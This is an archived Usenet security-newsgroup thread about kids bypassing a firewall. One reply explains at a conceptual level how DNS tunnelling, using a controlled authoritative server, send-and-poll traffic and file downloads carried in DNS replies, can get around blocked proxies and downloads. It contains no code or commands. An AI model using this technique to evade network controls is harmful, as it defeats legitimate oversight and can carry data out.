Re: Kids bypassing firewall via web proxy sites



E. wrote:
Sebastian Gottschalk wrote:
E. wrote:
How would you establish communications to a blocked site when
proxies are also blocked?

DNS

So you can resolve the IP using a UDP packet.

If I control the authoritative DNS server for the domain I'm trying to
resolve it's up to me what content is inside the DNS request/reply.
Besides, for DNS you need TCP as well (no, not only for zone transfers).

How do you propose to get a two-way connection going using a UDP53,
and browsing myspace using this?

Send/poll from the client side. Please have a look at the "wwwsh"
section of [1]. We didn't use DNS there, but I suppose you'll get the
idea.

Would standard clientside computer policy allow the user access to
use/install the tools needed to do this?

That's the point: Modern policies can prohibit _running_ such tools,
at least to a certain level. Not so reliable, but pretty effective.

That's why downloading such utilities being possible, besides
circumventing the policies, is no big problem.

As already stated, all downloads being blocked. Sending a UDP packet
does no equal a downloaded utility.

You are not limited to one UDP packet. And of course it's no problem to
encapsulate the download in DNS replies and re-assemble the file on the
client side.

[1] http://copton.net/Personal_Firewalls/ccc-vortrag-en.html

cu
59cobalt
--
"If you think technology can solve your security problems, then you
don't understand the problems and you don't understand the technology."
--Bruce Schneier
.



Relevant Pages

  • RE: How to disable the "implicit mx record" in Exchange
    ... site host is a different company, ... DNS host is yet a different company. ... handle new extensions to DNS UDP packet size. ... perhaps slow response from the recipient domain's DNS servers during ...
    (microsoft.public.exchange.admin)
  • Re: Definitive iptables configuration for DNS cache?
    ... > cannot get any other hosts to connect when the firewall is running. ... DNS is a little different than other ... UDP for queries, not TCP. ... if the reply to the query is too large for a single UDP packet. ...
    (comp.os.linux.security)
  • Re: Kids bypassing firewall via web proxy sites
    ... So you can resolve the IP using a UDP packet. ... If I control the authoritative DNS server for the domain I'm trying to ...
    (comp.security.firewalls)
  • Re: How do I configure iptables to allow DNS lookups?
    ... If I understand correctly how DNS works, ... > client sends a UDP packet from a high number port to port 53 on the name ... The name server responds with a UDP packet back to that high ...
    (Debian-User)
  • Re: How do I configure iptables to allow DNS lookups?
    ... If I understand correctly how DNS works, ... > client sends a UDP packet from a high number port to port 53 on the name ... The name server responds with a UDP packet back to that high ...
    (Debian-User)